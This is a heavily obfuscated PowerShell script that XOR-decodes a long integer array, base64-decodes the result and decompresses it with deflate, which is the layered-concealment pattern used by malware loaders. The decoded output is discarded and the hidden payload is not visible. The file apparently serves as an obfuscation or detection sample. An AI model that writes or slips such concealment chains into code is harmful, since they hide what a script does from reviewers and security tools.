fUNCtIoN mEFoEb { 
    [ cMDletBIndiNG() ]Param( 
        [PARamETER(ValuefROmpIPeLInE)]
        $CtjD,
        [PARamETER(ValuefROmpIPeLInE)]
        $iWVeosrY,
        [PARamETER(ValuefROmpIPeLInE)]
        $zrrictZM
    )
    $CtjD.rePLaCe(([chaR]86+[chaR]54+[chaR]75),[sTriNG][chaR]58).rePLaCe('M8N','`').rePLaCe('us4',[sTriNG][chaR]124).rePLaCe(([chaR]118+[chaR]49+[chaR]77),[sTriNG][chaR]92).rePLaCe(([chaR]88+[chaR]111+[chaR]72),'$').rePLaCe(([chaR]48+[chaR]108+[chaR]80),[sTriNG][chaR]39)| OUT-Null
     $iWVeosrY.REPLaCE('gOI',[STRIng][ChAR]34).REPLaCE(([ChAR]70+[ChAR]118+[ChAR]76),'$').REPLaCE(([ChAR]53+[ChAR]115+[ChAR]77),':').REPLaCE(([ChAR]73+[ChAR]114+[ChAR]111),'.') | OUT-Null
    [io.MEmorYstrEaM] [cOnVert]::fRoMBasE64STrInG( $zrrictZM)|NxUkk
}
fUNCtIoN NxUkk { 
    [cMDletBIndiNG() ]Param( 
        [PARamETER(ValuefROmpIPeLInE)]
        $KLzjVL
    )
    (nEW-obJECt   io.strEamREADER( ( nEW-obJECt  SystEM.IO.compreSSION.defLaTEStrEAm( $KLzjVL,[iO.COmPrESSIOn.COmpREsSIonmodE]::decoMpreSs )),[tExT.encodiNg]::aScii) ).rEADToEnD( ) | OUT-Null
}
 $oVlp= 'XoHresult = 0lP}oJcRNoNus4>Nus4npjM<o45H7xwAkV;5GyIPfFcQV6K}G8zFs6us4lIlfAnVlOtLKlIjIp@8nUW5Qs9efkp=lXu>BVv1AM8Nvi^Z1whG2gOh}OFkaqexW[eA5HO}m@[r8us4hGyJBP@]VzIt}uchXeKRaf1KvDMZOV6K6G}m7{pG8wqxF9NNB^AwGa;y68MQZbtgAXY2>X;{8=wfo0r2mOMdLIQS0HhdKFtgnT?D<M8Nv3Zzfw1VuZ=BV[wc=u7gxzMoPgoBbVrdCC}tXnp8Bfbvlczzc^}y2ieWQv=Gyc}>8RIYTK8mv1MLvHtkROB49HK^M8NtegBsWhus4jdeZ<N1Z<MpmRiH?4{Ixoby6us4vpbtrsBIa[kd{lP[>ouHCbj3MS;@yXm7;9V6KL8r?Tmdu<4WluOEt<R7iO?PxaK_M8NnzLBvvt0jD]w}w6RU688y{BOo}]tTZe=7d}oRjix2qo;gg>8F>a7^l0Xdv1MQanM8N8xeus4jGWus4Btr5QHM8NW5}Ca;^vksF_<P=nV6KHO0npPV6KIYwG7g[6WPOus4XeD;hHm^us4<1UOMhX0lP'
$PSxFz ='FvLresu' 
$PSxFz += 'lt = gO'
$PSxFz+= 'II wish' 
$PSxFz +=' I coul' 
$PSxFz+= 'd be mo'
$PSxFz +='re like'
$PSxFz+= ' youIro'
$PSxFz+='ip5sM2I'
$PSxFz +='ro161Ir'
$PSxFz+='o98Iro2'
$NJGHEg = '02gOI
' 
$NJGHEg=$PSxFz + $NJGHEg 
$pzOasw=[iNt[]]( ( 22+ 45),( 17 +100),( 15 +82), ( 31 + 75), (13+91),(15+ 91),( 85+12),( 57+ 27), (61 +12), (48 + 44),(33+34), (67- 3), ( 94+21), ( 46+11), ( 63+ 55),( 11+84), (21+ 37),( 64- 54), (76 + 50),( 29 + 45), ( 1 +116), ( 76 -1), (53+66), ( 30+ 46),(57 + 27), (19 + 100),( 39 + 25),(18+54), ( 43 + 64), (1+ 115),( 92+ 12),( 83+ 37), (40 +76),(25+97), ( 9 +27),(11+65),( 15 + 76),( 90 + 7), (87 +15),(16 +102),( 76 +32), (36 + 50),( 23+ 82), ( 26+ 32),(38 + 4), ( 96 +10), (62 +38),( 62 + 55),(79 + 11), ( 4+97), ( 39 +70),(71 -9), (79+36), (76 + 32),(97+23),( 6 +43), ( 37+ 82), (57+56), (57+33),(92- 42), ( 7+111),(75 +10), ( 86- 58),(42- 3),(97 - 57),( 58 - 10),(83+14), ( 0+10),( 52 + 24),( 5+ 41), ( 75 + 30), ( 37+ 32), ( 36 +60), (36+55),(81 -35),( 45+ 8), ( 21 + 51), ( 7 +100),(74 -39),( 14+ 36), ( 53+2), (29+ 46),(7+96),(45 + 55), ( 86- 46), (23+ 60), (44+70),(55 - 45), (74 -5), (43+63),( 77 + 38), ( 98 -1), (9 +95),(25 + 37), (42+59),(56 +61),(56+56), ( 40+ 76), (66- 7), (70+35), (99 -46), (99+ 15),( 58 +12), ( 51+60), (81 - 38), ( 14 +92), (68+ 12),( 65 + 11),(34 +1),(78 -31),( 0 + 62), (77+ 13),(37+88),(2+ 94), ( 85 +15), ( 40 + 61),( 49 +58),( 94 -66), (49+ 11),(9+ 117),( 77+ 23), ( 19 + 79), (15 + 81),(89 -54),( 80 + 34),(97 -22),(20+ 66),( 68 -40), ( 34+ 25),( 29+56),(58 +56), ( 3+94), ( 10 + 83),(47 +54), ( 38+75), (65 + 8),(25 +90),( 96 + 7), (50 +71),(29 +98), ( 33+ 48),(45 -8),(46 + 27),( 97 + 26), ( 30 +58),( 84 -20), ( 68- 28),(39 +78),( 3 + 92), (70+3),( 13+95), (40 + 76), (62+8), (71 + 30), ( 0 + 116), (84+32),( 72+20), ( 97-32),( 19+ 49),(59 +47), ( 47 + 32),( 86+9),(96-82),(38+40),(60 - 24),(73 -5), (26+76),(76 -9), (98 +5), ( 41 + 30),86,(79+ 4), (15 +85), (38+70), ( 39 + 74),(85 +2), (97- 58), ( 1+81),( 19 +57), (96- 51),(54 +47), ( 18+79),( 13+ 52), ( 97- 30), (81+36),(25+44),(21 +47),( 20+76),96,(57+58), ( 35+40),(73 + 23), (70 +40), 74, (70+8),(35 +73),( 99 + 24),(54 - 34),( 80+ 21),(18+ 108),(33 + 67),( 21+ 105), (41 + 66), (40+85), ( 61+ 23), (1+126), (20+45), ( 63+11), ( 44+ 82),( 72 +47),( 27+57), (84-11), ( 27+72), ( 66+9),(32+10),( 92 -26), ( 33+ 93), (36+ 46),( 85+ 40), (94-9), (78+7), (68 +3), (87- 10), ( 11+ 102), (96 - 50), ( 51 +64), ( 76- 10), ( 12 +102), (33 +43),( 39+ 33), ( 52+ 1),(19+ 14), ( 83+ 28),( 14+ 83), (85 +34), (60 +22),(13 +83), ( 92 -18),65,(29 +56), ( 72-2),(63-25),( 29+73), ( 78- 20),(8+ 35),(73 +26), (19+96),(58+ 66),( 93 +32),(25+ 94),(86+31),( 38+87), (34 + 76),( 6+ 86), (95+9), (34 +68), ( 46 + 59), (38+74),( 56+19), ( 56+66),(32 + 65), ( 58 +66),( 80 -62), ( 64 +36),( 86+ 35), (100+8), (60+ 35),( 38 + 77), (43 + 51),( 63-27), (42+38), ( 1 +114), (77+ 29), ( 37 + 68), (79 + 29),( 68 - 5), (29+9), (13+ 7), ( 64+ 45),(42 +62),(91 -10),(58+64),( 39 + 68), (47+66),( 90 -44), (24 +72), ( 55+ 28),( 74+1), ( 87+ 15), ( 54 +66),78,( 2+ 115),( 91 + 2), (55+ 36),(30 +78), ( 19+51), (25+ 41), ( 22 + 70), (32 +37), ( 22 +63),(47 + 53),(99 + 6),(17+ 80),(78- 39), ( 0+ 82),( 69 -16),(43 + 80), ( 99-81),(45+ 28), (48 + 31), (24 + 90), ( 63 -27), ( 3+103), (80-24), (71 +10), ( 18 + 37),(72-37),(63+5), (63- 5), (48 + 38), (6+38),( 66+ 48), ( 67 + 11),( 15+ 50), (80 +11), (74+20), (17+ 105),(3 + 90), (95- 35),( 50 + 76),(98- 25), ( 53 +22),(49 +70),(6 +116), ( 72 -22),(16 + 58),(71+49), ( 89 - 61), ( 69+7),( 24+ 54),( 1 + 86),(73+24),(81- 71), (29+85),41, ( 82- 42), ( 34 +92),(29-15),( 97 - 23),(9+77), ( 29+ 79),(70 -32), (64+3), (27 +95),(76- 7), (18 +83),(17+ 100),(88+ 11), ( 93 - 3),( 36 + 10), (21+41),( 77 +8), (86 -13), ( 61 +31), ( 59+ 47),( 38 +48),( 23 +66),( 7 +9),( 17+56),( 66+6),(49+ 24), ( 7 +86), (13+62), ( 99 - 41),(55+ 72),(91 + 13), ( 29 +92), (15+ 69), (77+ 49), (4+119), (47 +40),(43+54), (49-30), (80+ 34),( 30+11),( 26+101),(13+58), ( 37+ 73), (98- 10), (96 - 1), (85+1), ( 70+ 25),(95 + 10), (62 +47), (47 +24),( 2+74), ( 60-24), (23 + 84),( 96 + 9), ( 46+ 1), (29 +83), (60+ 10), ( 87-71), (26+ 45), ( 17 + 23), (76-7),( 89 +32), ( 85-18), (41+ 69),(87 - 50), ( 49+63), ( 85 - 10),73, ( 34 +65),(43+ 4),(31 +94), ( 65+28), (6 +8),( 48 +59),( 62+10), (12+114), ( 57 -18), (43+ 38),(62 + 37),( 40+29), (45 + 49),75,( 60 -43), (48+ 60),(19+ 55),(67 + 31), ( 18+ 72), (23+ 96),( 57-18), ( 44 + 28), (79+38), ( 74 - 36), ( 62 +34), (25 + 100),(73-32),(55- 1), ( 32+ 53), ( 42+38), ( 76 +35), ( 49+58),(80 +47), (100+ 1), (15+ 99),(18+ 64), (22 +92), (80 -3),( 63 -31), ( 60+ 64),(47+ 17), ( 34+11), ( 15 +71),( 55+45),(40 +42),( 31 + 65),( 54+ 73), (20 + 88),( 76 + 16),(93+3),( 7+83),(61 +28), ( 71 -16),(54 +12),(81 - 13), (56 + 70), ( 93 -7), ( 5+ 50),(66 +20),(45+ 59),( 65+ 61),( 72 + 9), (25 + 53), (32+75), (64+ 43), ( 59+39),( 74+ 47),(0 +54),(13 + 81),( 60+6),(34 + 33),(57+ 20),( 32 +23), (72 +22),( 25+42), ( 18 + 94), (5 + 102), (54 +12),(25 + 8),( 31 + 42), (36 +69), ( 35+ 80),(18+ 48),( 4+101),(78+1), (2 +122), ( 53 + 48),( 56+ 51), ( 44 -6), ( 32+83), (64+ 63),(75+2), (18+ 48),( 46+21), (47 - 28),(22+74), ( 41- 4), ( 53 +11),( 74 - 2), (60 + 32), ( 52+ 47),( 69 - 22), (90 + 27), (89- 6), (85 + 42),( 77-15), (69+8), (4+65),(93-26), (68 - 50), (99 +23),( 70 -1),(51 +76),(28 + 34),( 19+93), ( 37 + 62),( 4+116),( 47 + 32), (59-22), (20+ 9), ( 60 + 3),( 18+90), (67+47), ( 30+ 66),( 35 +70),(69 +28),( 48 + 33), (20+ 64),(57+59), ( 100+ 4),(48 +44),( 93+ 22),( 8+ 40),(57 + 59), (97 +6),(17+ 79), ( 33+62), ( 33+ 54), (95- 27), (84+ 21), ( 53+44), (7 +97), (93 - 39),(67-33), (20+ 87),( 10+102), ( 23 + 60), (23 + 70),(47- 9),( 75+10),( 71+ 49),( 53 + 38), (50 +49),( 66+ 54), ( 41+ 40),( 57 + 31), (98+ 2),( 57+ 38),( 87 - 1),(57 - 39), ( 5+54),( 39+35),( 99 - 45),(22 + 10),(11 + 88),(0+ 66), ( 99 -8),(2 + 76),( 57 +63),( 90+ 28),( 37+54), ( 78-34),( 81+ 38), (3+101), (99+ 6), (47+ 24),(10+ 108),(97 +4), ( 75+16),( 55+ 26),(87 -26), (23 +100), (45+ 8), ( 1 +126), (25 +49),( 89+24), (26 + 47),( 87- 25), ( 17 +21),(24 +90),( 15 +54),( 27 +16),( 58 +16), ( 13 + 94), (100-83),( 21 +54),( 2 +48), ( 15+64), (5 + 67),( 9 + 1),( 38+ 29), (30 + 88), (16+82), (39 + 63),(63 + 20), ( 58+69), ( 27+ 42),( 79+ 46), (26+71),(20 -10),(1 + 101), ( 71 +21),(97-3), (41+ 58),( 87- 3), ( 93+1),(90+11),( 31+63),( 0+ 80),( 28+67), (73 + 6), ( 19 + 90),( 38 + 60),( 44 +60), ( 95-79), ( 98 -19),( 58+47), (20 + 74), (9 + 82), ( 60 + 54),(64+16), (25 +96), (1+ 54), ( 56 +49), (72 +21), ( 64+ 26), ( 6 + 115),( 58 + 21), (75+27), ( 17+ 11), ( 57 +21), (72+ 33), ( 27+36), ( 55+ 14),(5+ 17),(15 +87),(50+ 27), ( 90 +9), (16+ 24), ( 63-49), ( 22 + 83), ( 83 -3),( 74- 23),( 22 + 61), ( 88 + 31), ( 9+85), (66-12), (52+ 73), (81 +14),( 40+47),( 96 -47), ( 76 +7), (100- 7), (18 +16),( 55 -36), ( 38+ 88), ( 3 +102), (39+ 47),(33+ 88), ( 50+ 63),(31+18),( 75+47),(6 + 49), (27+65), ( 67 +42), (99-3),( 56-12),( 76+21), ( 52 + 40),(61 + 51), (64 + 31), ( 5 +82), (6 + 34), ( 77 -43),(4 + 76), ( 23+ 42),( 49- 3), (92 +35),( 87+1), (11 + 9),( 79- 15),( 69- 33), (9 +91),( 73 - 38), ( 62-44), (54 + 59),( 19+ 26),( 62 + 16),( 91 + 14),( 84 -7),(31+89), ( 62 +22),(61 + 21), (70 +24),( 3 + 20),( 66+ 56), (20+ 64),(5+ 35),( 61 - 22), ( 50+ 17), (38+21), ( 22+ 88), ( 30 +10), 90, (42 + 57), (21+ 46),( 4+90), (6+ 44),(63 -23),(92 - 10), ( 19 + 94),(93 +31), ( 81 +30),(66 + 38),(95 -21), ( 47+20), (34+80),( 76-8),(38 +50), ( 31- 17),(56 + 68),(44 + 36),(95 - 41),( 26+61), ( 12+93), ( 57 +7),( 35 +86),(42+ 40), ( 40+26), ( 58+ 8), ( 54 +55),( 45 - 9), (45+ 82),( 62 + 57),(15 +52), ( 19+83), (64 +54),(11+82),( 28+55), ( 10+67),( 93 -33), (30+ 88),( 86 -36), (56+38), ( 96-11),(99 -30), (56 +53),( 99 -27),(68 +31), ( 41+40), ( 84 +10), ( 2 +114), (54+41),(22 + 43),( 79 - 56), ( 54 +26), ( 85+26),(96-1), ( 32 +65),(70- 56),( 83 - 13), (98- 16), (96+23),(52+13),(63+ 44), (28+31), ( 41 + 33), (95+5),(11 + 56), ( 54+ 42), (77+43),(19 + 76), ( 13 +61),(54+61), (50 + 48), (78- 19),( 81 +26), ( 4+ 96),( 18+ 54), ( 89 -70), (95 -60), ( 17 + 56), ( 65 + 18), ( 25+48), (57 + 54),( 38 + 82), ( 8 + 38), ( 16+58),( 86+30),( 48+24),( 38 + 31), ( 68 -18), (41+ 42), (5+117), ( 35 -17),(8 +99), ( 79 +30), ( 67+6),( 47+ 80), ( 20+89), (52+ 49), ( 23+ 19), ( 90 -5), ( 5+98), (26+ 72),( 84 +43),( 15 + 71),( 98- 49),( 94 +6),( 49+ 70), (31+80), (0 +92),(26+ 79), (79 - 8), ( 2+ 113), ( 10+ 116), ( 87+39),( 91 - 41),( 25 +75),( 86 -69), ( 15+ 41),( 83 +28), (99 - 23),( 65+ 55), (59+ 37), ( 46 +51), (31 + 93),( 20+80),(76 + 18),(70+29),(41+69),(97-7), ( 57 + 51), (42-7), ( 44 -34), ( 60 + 50),( 25+ 15), (30 +67),(79 +22), (12 +97), (57 +40),(85+ 6),( 6+62),(94-24),(60+25), (11+96),( 10 +97),( 78 +23),(92 -8),( 38 +43),(58+ 49),( 60-10), (95 + 10),(40 + 86),(78+6),( 76+17), (27 +20),( 24 + 25),(61+9),( 22+ 6),( 52+7), (72 + 48), ( 43 + 38),(80 + 38),( 11+10),(89 +36), ( 3+81), (3+ 101), ( 18 + 104), (3+18),( 45+79), (25+22),(2+ 97), ( 8+65), (68+ 8),(63 - 24), (1 +126), (27 + 72), (37+ 86), (76 - 2),(23 +103),(5 +112),( 7+ 77),( 72 + 16),( 62 +15),(75+37), ( 56 + 22), (83 +15), ( 21 + 77),(98 - 20),( 89 - 30), ( 22+ 22), ( 99+11), ( 46 + 38),(27 - 11), (78 + 33), ( 37+42), ( 95 +5),( 28 +69),(61+ 44), ( 84 + 37), (52-16), (85 -30), ( 97 +26), (73+14),(33 + 94), (17+ 100), ( 92+9), ( 87+30), ( 59 + 25), (9 + 118), ( 33 + 90),(99+15),(80 + 27),( 61 + 64),( 74+ 28), (66+ 42),( 29 +45), (17+47),( 23 +81), ( 96 +26),(32 +81), (100- 26), (24+15), (4 + 14),( 12 + 85), ( 99-30), ( 83+ 28),(98- 30), ( 36 +40),( 49+29),(18 +86),(52 +73), (80 + 39),(1+96), ( 23 +52),(60+ 26), ( 26 + 76),( 100+19),( 11 + 7), (59 - 10),(100- 5), ( 44+ 68), ( 46- 2), ( 12+12))
$GvRUOtV =@(( 23-16), (95-78), ( 87 -50),( 53- 45),(82-53))
$DGiulS = @()
FOr( $i =0;$i -lt $pzOasw.leNgTh;$i++) {$DGiulS+=$pzOasw[ $i]-bxor $GvRUOtV[ ($i %$GvRUOtV.length)]} 
$DGiulS =([ cHAr[]] $DGiulS) -jOIN ''
mEFoEb -CtjD $oVlp -iWVeosrY $NJGHEg -zrrictZM $DGiulS

